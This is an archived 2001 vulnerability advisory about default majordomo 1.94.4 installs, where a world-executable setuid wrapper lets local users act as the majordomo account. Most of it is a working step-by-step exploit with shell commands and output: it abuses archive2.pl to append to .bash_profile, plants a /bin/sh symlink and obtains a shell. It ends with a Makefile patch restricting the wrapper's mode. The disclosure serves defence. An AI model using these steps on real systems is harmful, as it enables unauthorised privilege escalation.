majordomo.1.94.4.txt

`Hi,  
I found something to discuss, this time involving majordomo.   
This was tested on a Slackware linux 8.0 (kernel 2.4.8);   
majordomo version 1.94.4, I also tested the other versions   
and all _default_ installs had the same problem, note that   
the versions 1.94.1 an 1.94.2 should NOT be used anymore,   
those are way more simple to exploit.   
  
We all know that if you install majordomo you should   
CAREFULLY read the INSTALL file, simply because else   
you will have a security problem. Only I doubt that everyone   
actually follows the guidelines. Besides that, I feel that   
Majordomodevelopers _could_ make a more secure default   
install without affecting the functionality of the program.   
A simple patch would _at least_ stop the possiblities which   
are descibed below.   
  
Also I did not find in the documents that majordomo should   
have a shell (so give it a nologin or whatever, it works fine   
without shell).   
  
An example:   
  
Who am i   
marco@anubis:~$ id -a   
uid=1001(marco) gid=100(users) groups=100(users)   
  
This could happen if you give it a /home/majordomo   
  
marco@anubis:~$ ls -al /home/|grep majordomo   
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/   
  
Suidbit + executable for everyone (this is where the patch comes in)   
  
marco@anubis:~$ ls -al ~majordomo/wrapper   
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51 /home/majordomo/wrapper*   
  
This is the program I'm going to abuse   
  
marco@anubis:~$ ls -al ~majordomo/archive2.pl   
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51 /home/majordomo/archive2.pl*   
  
Make a template   
  
marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test   
  
Append majordomo's .bash_profile (or .profile etc..) with your template   
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is,   
that one can use /'s, I need wrapper for becoming user majordomo though).   
  
marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test   
  
Now hit the .bash_profile (sometimes the majordomo admin might need it   
and do the same).   
  
marco@anubis:~$ su - majordomo   
Password:   
majordomo@anubis:~$ id -a   
uid=666(majordomo) gid=2(daemon) groups=2(daemon)   
majordomo@anubis:~$ exit   
  
See if it worked   
  
marco@anubis:~$ ls -al ~majordomo/sh   
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh*   
  
Jupz it worked, now someone could abuse it, let's do that.   
  
marco@anubis:~$ ~majordomo/wrapper sh   
sh-2.05$ id -a   
uid=666(majordomo) gid=2(daemon) groups=100(users)   
sh-2.05$   
  
Ok, I'm majordomo.   
  
Also, in the README file is described how one could debug majordomo.   
  
  
Finally, if you're up to mucking around in the perl code, symlinking   
perl into ~majordomo and invoking it via wrapper will give you a debug   
environment with Majordomo's permissions and view of the world:   
  
~majordomo% ./wrapper perl -d majordomo   
  
  
Well, same problem :)   
Dont forget to remove the symlink or else everyone can do this:   
  
marco@anubis:~$ /home/majordomo/wrapper perl   
system("/bin/sh");   
^D   
sh-2.04$   
  
One could append the perlfiles to make them execute your evil code of   
course since the archive2 program appends. This could give a majordomo   
uid/daemon gid shell.   
  
The main point here is that we can write to majordomo owned files to   
simply alter data in the lists or score a shell (and obtaining a daemon  
gid). reading the INSTALL file carefully will help you to prevent this,   
but I prefer to apply a patch before starting the installation to make   
sure that the wrapper is not executable for everyone (it _should_ have   
4750 and not 4755).   
  
--- simple patch to make default install more secure ---   
  
--- Makefile.orig Fri Sep 14 09:43:45 2001   
+++ Makefile Fri Sep 14 09:44:20 2001   
@@ -42,7 +42,7 @@   
# change these values!   
WRAPPER_OWNER = root   
WRAPPER_GROUP = $(W_GROUP)   
-WRAPPER_MODE = 4755   
+WRAPPER_MODE = 4750   
POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP)   
# Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4,   
# HP DomainOS) then comment out the above four lines and uncomment   
  
just my 2 cents,   
grtz,   
Marco van Berkum   
--   
GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---  
O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----  
G++ e- h+ r y*  
+---------------------+------------------+-------------------+  
| Marco van Berkum | MB17300-RIPE | Security Engineer |  
| http://ws.obit.nl | "Chernobyl used | Network Admin |  
| [email protected] | Windows" | UNIX |  
+---------------------+------------------+-------------------+  
`